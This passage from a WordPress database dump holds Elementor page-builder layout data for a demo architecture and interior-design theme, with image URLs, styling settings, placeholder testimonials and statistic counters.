\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3087,4750,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3088,4750,'_elementor_pro_version','3.8.1'),(3089,4750,'_elementor_css','a:6:{s:4:\"time\";i:1685009709;s:5:\"fonts\";a:1:{i:0;s:4:\"Reey\";}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3090,4751,'_wp_page_template','elementor_header_footer'),(3091,4751,'_elementor_edit_mode','builder'),(3092,4751,'_elementor_template_type','wp-page'),(3093,4751,'_elementor_version','3.8.1'),(3094,4751,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"LOREM IPSUM\",\"title\":\"LOREM IPSUM\\n\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Redesign Life<\\/span><\\/p><p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/upl